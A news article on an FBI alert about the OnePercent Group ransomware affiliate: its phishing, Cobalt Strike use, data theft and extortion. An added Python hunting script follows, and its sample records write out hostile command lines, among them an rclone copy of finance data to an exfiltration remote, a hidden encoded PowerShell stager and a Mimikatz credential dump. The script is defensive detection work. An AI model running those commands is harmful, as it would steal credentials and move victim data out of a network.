The FBI has identified a threat actor known as OnePercent Group, which has been actively targeting organizations in the US since November 2020.
“The FBI has learned of a cyber-criminal group who self-identifies as the ‘OnePercent Group’ and who have used Cobalt Strike to perpetuate ransomware attacks against US companies since November 2020,” the FBI said.
OnePercent Group runs a double-extortion operation: it exfiltrates the victim’s data first, then encrypts it, and uses the stolen files as additional leverage for the ransom demand.
“The actors contact the victims via telephone and email, threatening to release the stolen data through The Onion Router (TOR) network and clearnet, unless a ransom is paid in virtual currency,” the FBI said.
In the initial stage of the attack, the actors use phishing emails to infect victims with the IcedID banking trojan. Once IcedID is running, it is used to install Cobalt Strike on the compromised endpoints, which the actors then use to move laterally through the network.
OnePercent maintains access to the network for up to a month while exfiltrating files. Only after that do they launch the ransomware payload to encrypt the victim’s data.
The ransom notes point victims to a Tor website where they can get more information on the ransom, negotiate with the attackers and obtain “technical support.” Victims are asked to pay, typically in Bitcoin, to receive a decryption key within 48 hours.
The FBI also noted that the actors contact victims from spoofed phone numbers once the ransomware has run.
“Once the ransomware is successfully deployed, the victim will start to receive phone calls through spoofed phone numbers with ransom demands and are provided a ProtonMail email address for further communication,” the FBI added. “The actors will persistently demand to speak with a victim company’s designated negotiator or otherwise threaten to publish the stolen data.”
The FBI lists the following applications and services as part of OnePercent Group’s toolset and infrastructure: AWS S3 storage, IcedID, Cobalt Strike, PowerShell, Rclone, Mimikatz, SharpKatz, BetterSafetyKatz and SharpSploit. Mimikatz, SharpKatz and BetterSafetyKatz are credential-dumping tools, and SharpSploit is a .NET post-exploitation library; Rclone is a command-line utility for syncing files to cloud storage such as S3.
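The tooling above is the most concrete thing in the alert a defender can act on. As an added example, which is not part of the FBI alert or this article, the Python below scans constructed process-creation records for that tooling: the named tools (matched on the image name and on the PE OriginalFileName, so a renamed rclone.exe or mimikatz.exe still hits), an Rclone transfer to a remote destination in the `remote:bucket/path` syntax, and the hidden, encoded PowerShell shape that Cobalt Strike’s stock stager uses. The `Key=Value|Key=Value` record layout, the field names (loosely modelled on Sysmon event fields), the hostnames, the command lines and the regexes are all assumptions made for this example; none of it is an indicator published by the FBI.

```python
"""Hunting heuristics for the OnePercent Group tooling named in the FBI flash.

Added example, not from the FBI alert or the article. Record layout, field
names and sample lines are constructed for illustration.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Tool names from the FBI alert. Matched against the image file name and the PE
# OriginalFileName, so renaming the binary on disk does not hide it.
TOOL_NAMES = ("rclone", "mimikatz", "sharpkatz", "bettersafetykatz", "sharpsploit")

# rclone transfer verb followed by a remote destination written as
# <remote>:<bucket>/<path>. Remotes shorter than two characters are ignored so
# that Windows drive letters (D:\...) do not match.
RCLONE_EXFIL = re.compile(r"\b(copy|copyto|sync|move)\b.*\s[A-Za-z0-9_-]{2,}:\S*", re.I)

# Stock Cobalt Strike PowerShell stager shape: an encoded command (-e, -ec, -enc,
# -EncodedCommand) together with -nop / -w hidden. Admin scripts rarely combine
# these, but it is a weaker signal than a named tool, so it is rated medium.
PS_ENCODED = re.compile(r"(^|\s)-e(ncodedcommand|nc|c)?\b", re.I)
PS_QUIET = re.compile(r"(^|\s)-(nop|noprofile|w|windowstyle)\b", re.I)


@dataclass
class Finding:
    host: str
    reason: str
    severity: str
    command_line: str


def parse_record(line: str) -> dict:
    """Parse one constructed 'Key=Value|Key=Value' process-creation record."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def check_record(rec: dict) -> list[Finding]:
    """Apply the three heuristics to a single parsed record."""
    host = rec.get("Host", "?")
    image = rec.get("Image", "").lower()
    base = image.rsplit("\\", 1)[-1]          # file name without the directory
    original = rec.get("OriginalFileName", "").lower()
    cmd = rec.get("CommandLine", "")
    out: list[Finding] = []

    for name in TOOL_NAMES:
        if name in base or name in original:
            where = "OriginalFileName" if name in original and name not in base else "Image"
            out.append(Finding(host, f"known tool {name} ({where})", "high", cmd))
            break

    if ("rclone" in base or "rclone" in original) and RCLONE_EXFIL.search(cmd):
        out.append(Finding(host, "rclone transfer to remote storage", "high", cmd))

    if base in ("powershell.exe", "pwsh.exe") and PS_ENCODED.search(cmd) and PS_QUIET.search(cmd):
        out.append(Finding(host, "encoded hidden PowerShell (Cobalt Strike stager shape)", "medium", cmd))

    return out


def hunt(lines: list[str]) -> list[Finding]:
    """Run the heuristics over a batch of records and collect the findings."""
    findings: list[Finding] = []
    for line in lines:
        if line.strip():
            findings.extend(check_record(parse_record(line)))
    return findings


# Constructed sample records: two benign, four that should fire.
SAMPLE_RECORDS = [
    r"Host=FS01|Image=C:\Windows\System32\notepad.exe|OriginalFileName=NOTEPAD.EXE|CommandLine=notepad.exe report.txt",
    r"Host=FS01|Image=C:\Users\Public\rclone.exe|OriginalFileName=rclone.exe|CommandLine=rclone.exe copy D:\Finance s3exfil:corp-dump/finance --transfers 32",
    r"Host=DC02|Image=C:\Windows\Temp\svchost.exe|OriginalFileName=rclone.exe|CommandLine=svchost.exe sync \\FS01\Shares remote:bkt/shares",
    r"Host=WS17|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|OriginalFileName=PowerShell.EXE|CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    r"Host=WS17|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|OriginalFileName=PowerShell.EXE|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"Host=WS09|Image=C:\Temp\m.exe|OriginalFileName=mimikatz.exe|CommandLine=m.exe privilege::debug sekurlsa::logonpasswords",
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_RECORDS):
        print(f"[{f.severity:<6}] {f.host}: {f.reason}\n           {f.command_line}")
```

The OriginalFileName check is the part worth keeping even if the rest is replaced by vendor signatures: attackers routinely rename rclone.exe or a Mimikatz build to something innocuous, but the name compiled into the PE version resource usually survives. The PowerShell heuristic is deliberately gated on both an encoded command and a hidden/no-profile switch, so the plain `-ExecutionPolicy Bypass -File` admin script in the sample set does not fire.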
The FBI has linked OnePercent Group’s attacks to the notorious REvil gang, describing it as one of REvil’s affiliates, because OnePercent Group used REvil’s data leak site to leak and auction its victims’ stolen files.
“If the ransom is not paid in full after the ‘one percent leak,’ OnePercent Group actors threaten to sell the stolen data to the Sodinokibi Group to publish at an auction,” the FBI added.